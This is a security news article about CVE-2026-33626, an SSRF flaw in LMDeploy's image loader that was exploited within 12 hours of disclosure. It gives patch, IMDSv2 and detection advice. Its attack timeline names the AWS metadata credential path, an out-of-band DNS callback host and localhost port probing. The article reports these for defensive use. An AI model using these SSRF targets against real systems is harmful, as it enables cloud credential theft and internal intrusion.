PROBABLYPWNED
VulnerabilitiesApril 24, 20264 min read

LMDeploy SSRF Exploited 12 Hours After Disclosure

CVE-2026-33626 in LMDeploy AI toolkit was weaponized within 12 hours of publication, targeting AWS credentials and internal services. Patch to v0.12.3 immediately.

Marcus Chen

Attackers needed just 12 hours and 31 minutes to weaponize a critical vulnerability in LMDeploy, a toolkit for deploying large language models developed by Shanghai AI Laboratory. Sysdig researchers observed active exploitation beginning April 22, 2026 at 03:35 UTC—barely half a day after the security advisory went public.

The vulnerability, tracked as CVE-2026-33626, is a Server-Side Request Forgery (SSRF) flaw in LMDeploy's vision-language image loading functionality. It carries a CVSS score of 7.5 (High) and affects all versions prior to 0.12.3.

The Root Cause

The flaw exists in the load_image() function within lmdeploy/vl/utils.py. When processing vision-language model requests, the function fetches image URLs from API requests without validating whether they point to internal or private network addresses. Attackers can force the server to request arbitrary URLs—including cloud metadata services, internal databases, and administrative interfaces—and return their contents.

The absence of scheme or host validation means no protection exists against link-local addresses (169.254.0.0/16), loopback (127.0.0.0/8), or RFC 1918 private ranges. Any attacker who can send a chat completion request to an exposed LMDeploy instance can access internal resources.

Observed Exploitation

Sysdig captured an 8-minute attack session demonstrating methodical reconnaissance:

Phase 1: AWS Credential Theft The attacker targeted AWS Instance Metadata Service at 169.254.169.254/latest/meta-data/iam/security-credentials/, attempting to extract IAM credentials. A successful request here provides temporary access keys with whatever permissions the EC2 instance role allows.

Phase 2: Connectivity Confirmation Using an out-of-band DNS callback to cw2mhnbd.requestrepo.com, the attacker confirmed egress capability before enumerating API endpoints via /openapi.json.

Phase 3: Internal Service Discovery The attacker probed localhost ports systematically:

  • Port 6379 (Redis)
  • Port 3306 (MySQL)
  • Port 8080 (administrative interfaces)
  • Port 80 (web services)

The traffic originated from IP 103.116.72.119, associated with Hong Kong-based ASN 400618 (Prime Security Corp.). This type of systematic probing is typical of initial access operations—gather credentials, map internal services, and prepare for deeper compromise.

Who's Affected

Any organization running LMDeploy versions prior to 0.12.3 with exposed API endpoints is vulnerable. The toolkit is popular for serving vision-language and text LLMs, particularly in:

  • AI research environments
  • Production ML inference pipelines
  • Cloud-hosted model serving infrastructure

The risk is highest for cloud deployments where IMDS access could expose IAM credentials. Organizations running LMDeploy on AWS, GCP, or Azure should treat this as an emergency patch.

Immediate Actions

  1. Update to LMDeploy v0.12.3 - The patched version adds URL validation
  2. Enforce IMDSv2 - Set httpTokens=required and httpPutResponseHopLimit=1 on EC2 instances
  3. Rotate credentials - Any IAM roles on affected deployments should have credentials rotated
  4. Restrict egress - Limit VPC/security group egress to only necessary endpoints (S3, GCS, logging)
  5. Bind internal services - Ensure Redis and MySQL listen only on private interfaces with authentication

Detection Rules

Sysdig recommends deploying Falco rules to detect SSRF attempts:

  • "Contact EC2 Instance Metadata Service From Container"
  • "Contact GCP Instance Metadata Service From Container"
  • Cloud-provider variants for Azure and ECS/Fargate

Network monitoring should alert on connections to link-local, RFC 1918, or loopback addresses from inference processes.

Why This Matters

Twelve hours from advisory to exploitation is aggressive but not surprising. The vulnerability requires no authentication, no proof-of-concept code, and affects a tool deployed widely in AI infrastructure. Attackers understand that ML teams often prioritize model performance over infrastructure security—and that AI workloads frequently run with overly permissive cloud credentials.

This follows a pattern we've seen in other critical vulnerabilities affecting developer tools. As AI tooling proliferates, security teams need visibility into what's running in their ML pipelines. You can't patch what you don't know exists.

For organizations building with LLM infrastructure, this incident reinforces why defense-in-depth matters. Even if you'd patched within 24 hours—faster than most organizations manage—you'd have been vulnerable during the exploitation window. Network segmentation, credential scoping, and runtime monitoring remain essential regardless of patch velocity.

Related Articles